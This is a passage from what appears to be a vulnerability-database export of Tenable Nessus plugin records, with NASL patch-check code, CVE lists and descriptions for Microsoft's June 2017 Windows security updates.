script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\n## NB: Microsoft\nbulletin = 'MS17-06';\nkbs = make_list(\"4022719\", \"4022722\");\n\nif (get_kb_item('Host/patch_management_checks'))\n hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# KB only applies to Window 7 / 2008 R2, SP1\nif (hotfix_check_sp_range(win7:'1') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 7 / 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"06_2017\", bulletin:bulletin, rollup_kb_list:[4022719, 4022722]))\n{\n replace_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:30:55", "description": "The remote Windows host is missing security update 4022718\nor cumulative update 4022724. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. (CVE-2017-0193)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or to open a specially crafted document file, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285)\n\n - Multiple remote code execution vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or open a specially crafted document, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-0283, CVE-2017-8528)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document file, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289,\n CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these,\n by convincing a user to open a specially crafted PDF\n file, to execute arbitrary code in the context of the\n current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted \n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted PDF file,\n to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8469,\n CVE-2017-8470, CVE-2017-8471, CVE-2017-8472,\n CVE-2017-8473, CVE-2017-8474, CVE-2017-8475,\n CVE-2017-8476, CVE-2017-8477, CVE-2017-8478,\n CVE-2017-8479, CVE-2017-8480, CVE-2017-8481,\n CVE-2017-8482, CVE-2017-8483, CVE-2017-8484,\n CVE-2017-8485, CVE-2017-8488, CVE-2017-8489,\n CVE-2017-8490, CVE-2017-8491, CVE-2017-8492)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8517, CVE-2017-8522)\n\n - Multiple remote code execution vulnerabilities exist in\n Internet Explorer due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website, to execute arbitrary code in the context of the\n current user. (CVE-2017-8519, CVE-2017-8547)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper handling of objects\n in memory. An authenticated, remote attacker can exploit\n these, via a specially crafted application, to disclose\n the contents of memory. (CVE-2017-8553, CVE-2017-8554)", "edition": 39, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-06-13T00:00:00", "title": "Windows Server 2012 June 2017 Security Updates", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8472", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8522", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-8519", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2017-06-13T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_JUN_4022724.NASL", "href": "https://www.tenable.com/plugins/nessus/100762", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100762);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/28\");\n\n script_cve_id(\n \"CVE-2017-0193\",\n \"CVE-2017-0282\",\n \"CVE-2017-0283\",\n \"CVE-2017-0284\",\n \"CVE-2017-0285\",\n \"CVE-2017-0287\",\n \"CVE-2017-0288\",\n \"CVE-2017-0289\",\n \"CVE-2017-0291\",\n \"CVE-2017-0292\",\n \"CVE-2017-0294\",\n \"CVE-2017-0296\",\n \"CVE-2017-0297\",\n \"CVE-2017-0298\",\n \"CVE-2017-0299\",\n \"CVE-2017-0300\",\n \"CVE-2017-8460\",\n \"CVE-2017-8462\",\n \"CVE-2017-8464\",\n \"CVE-2017-8469\",\n \"CVE-2017-8470\",\n \"CVE-2017-8471\",\n \"CVE-2017-8472\",\n \"CVE-2017-8473\",\n \"CVE-2017-8474\",\n \"CVE-2017-8475\",\n \"CVE-2017-8476\",\n \"CVE-2017-8477\",\n \"CVE-2017-8478\",\n \"CVE-2017-8479\",\n \"CVE-2017-8480\",\n \"CVE-2017-8481\",\n \"CVE-2017-8482\",\n \"CVE-2017-8483\",\n \"CVE-2017-8484\",\n \"CVE-2017-8485\",\n \"CVE-2017-8488\",\n \"CVE-2017-8489\",\n \"CVE-2017-8490\",\n \"CVE-2017-8491\",\n \"CVE-2017-8492\",\n \"CVE-2017-8517\",\n \"CVE-2017-8519\",\n \"CVE-2017-8522\",\n \"CVE-2017-8527\",\n \"CVE-2017-8528\",\n \"CVE-2017-8531\",\n \"CVE-2017-8532\",\n \"CVE-2017-8533\",\n \"CVE-2017-8543\",\n \"CVE-2017-8544\",\n \"CVE-2017-8547\",\n \"CVE-2017-8553\",\n \"CVE-2017-8554\"\n );\n script_bugtraq_id(\n 98818,\n 98819,\n 98820,\n 98821,\n 98824,\n 98826,\n 98835,\n 98836,\n 98837,\n 98839,\n 98840,\n 98842,\n 98845,\n 98847,\n 98848,\n 98849,\n 98851,\n 98852,\n 98853,\n 98854,\n 98856,\n 98857,\n 98858,\n 98859,\n 98860,\n 98862,\n 98864,\n 98865,\n 98867,\n 98869,\n 98870,\n 98878,\n 98884,\n 98885,\n 98887,\n 98895,\n 98899,\n 98900,\n 98901,\n 98902,\n 98903,\n 98914,\n 98918,\n 98920,\n 98922,\n 98923,\n 98926,\n 98929,\n 98932,\n 98933,\n 98940,\n 98942,\n 98949,\n 98953\n );\n script_xref(name:\"MSKB\", value:\"4022724\");\n script_xref(name:\"MSFT\", value:\"MS17-4022724\");\n script_xref(name:\"MSKB\", value:\"4022718\");\n script_xref(name:\"MSFT\", value:\"MS17-4022718\");\n\n script_name(english:\"Windows Server 2012 June 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4022718\nor cumulative update 4022724. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. (CVE-2017-0193)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or to open a specially crafted document file, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285)\n\n - Multiple remote code execution vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or open a specially crafted document, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-0283, CVE-2017-8528)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document file, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289,\n CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these,\n by convincing a user to open a specially crafted PDF\n file, to execute arbitrary code in the context of the\n current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted \n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted PDF file,\n to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8469,\n CVE-2017-8470, CVE-2017-8471, CVE-2017-8472,\n CVE-2017-8473, CVE-2017-8474, CVE-2017-8475,\n CVE-2017-8476, CVE-2017-8477, CVE-2017-8478,\n CVE-2017-8479, CVE-2017-8480, CVE-2017-8481,\n CVE-2017-8482, CVE-2017-8483, CVE-2017-8484,\n CVE-2017-8485, CVE-2017-8488, CVE-2017-8489,\n CVE-2017-8490, CVE-2017-8491, CVE-2017-8492)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8517, CVE-2017-8522)\n\n - Multiple remote code execution vulnerabilities exist in\n Internet Explorer due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website, to execute arbitrary code in the context of the\n current user. (CVE-2017-8519, CVE-2017-8547)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper handling of objects\n in memory. An authenticated, remote attacker can exploit\n these, via a specially crafted application, to disclose\n the contents of memory. (CVE-2017-8553, CVE-2017-8554)\");\n # https://support.microsoft.com/en-us/help/4022724/windows-server-update-kb4022724\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4a3cabfc\");\n # https://support.microsoft.com/en-us/help/4022718/windows-server-update-kb4022718\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fcd66520\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4022718 or Cumulative update KB4022724\nas well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'LNK Code Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-06';\nkbs = make_list(\n '4022724', # 2012 Monthly Rollup\n '4022718' # 2012 Security Rollup\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (smb_check_rollup(os:\"6.2\", sp:0, rollup_date: \"06_2017\", bulletin:bulletin, rollup_kb_list:[4022724,4022718]))\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:44:12", "description": "The remote Windows host is missing security update 4022717\nor cumulative update 4022726. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. (CVE-2017-0193)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or open a specially crafted document, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285)\n\n - Multiple remote code execution vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or open a specially crafted document, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-0283, CVE-2017-8528)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289,\n CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these,\n by convincing a user to open a specially crafted PDF\n file, to execute arbitrary code in the context of the\n current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462,\n CVE-2017-8485)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted PDF file,\n to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Windows kernel-mode driver due to improper handling\n of objects in memory. A local attacker can exploit\n these, via a specially crafted application, to run\n processes in an elevated context. (CVE-2017-8465,\n CVE-2017-8466, CVE-2017-8468)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8469,\n CVE-2017-8470, CVE-2017-8471, CVE-2017-8473,\n CVE-2017-8474, CVE-2017-8475, CVE-2017-8476,\n CVE-2017-8477, CVE-2017-8478, CVE-2017-8479,\n CVE-2017-8480, CVE-2017-8481, CVE-2017-8482,\n CVE-2017-8483, CVE-2017-8484, CVE-2017-8488,\n CVE-2017-8489, CVE-2017-8490, CVE-2017-8491,\n CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure\n to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially\n crafted application, to bypass Unified Extensible\n Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper handling of objects\n in memory. An authenticated, remote attacker can exploit\n these, via a specially crafted application, to disclose\n the contents of memory. (CVE-2017-8553, CVE-2017-8554)", "edition": 41, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-06-13T00:00:00", "title": "Windows 8.1 and Windows Server 2012 R2 June 2017 Security Updates", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_JUN_4022726.NASL", "href": "https://www.tenable.com/plugins/nessus/100764", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100764);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/07/30 15:31:34\");\n\n script_cve_id(\n \"CVE-2017-0193\",\n \"CVE-2017-0282\",\n \"CVE-2017-0283\",\n \"CVE-2017-0284\",\n \"CVE-2017-0285\",\n \"CVE-2017-0287\",\n \"CVE-2017-0288\",\n \"CVE-2017-0289\",\n \"CVE-2017-0291\",\n \"CVE-2017-0292\",\n \"CVE-2017-0294\",\n \"CVE-2017-0296\",\n \"CVE-2017-0297\",\n \"CVE-2017-0298\",\n \"CVE-2017-0299\",\n \"CVE-2017-0300\",\n \"CVE-2017-8460\",\n \"CVE-2017-8462\",\n \"CVE-2017-8464\",\n \"CVE-2017-8465\",\n \"CVE-2017-8466\",\n \"CVE-2017-8468\",\n \"CVE-2017-8469\",\n \"CVE-2017-8470\",\n \"CVE-2017-8471\",\n \"CVE-2017-8473\",\n \"CVE-2017-8474\",\n \"CVE-2017-8475\",\n \"CVE-2017-8476\",\n \"CVE-2017-8477\",\n \"CVE-2017-8478\",\n \"CVE-2017-8479\",\n \"CVE-2017-8480\",\n \"CVE-2017-8481\",\n \"CVE-2017-8482\",\n \"CVE-2017-8483\",\n \"CVE-2017-8484\",\n \"CVE-2017-8485\",\n \"CVE-2017-8488\",\n \"CVE-2017-8489\",\n \"CVE-2017-8490\",\n \"CVE-2017-8491\",\n \"CVE-2017-8492\",\n \"CVE-2017-8493\",\n \"CVE-2017-8527\",\n \"CVE-2017-8528\",\n \"CVE-2017-8531\",\n \"CVE-2017-8532\",\n \"CVE-2017-8533\",\n \"CVE-2017-8543\",\n \"CVE-2017-8544\",\n 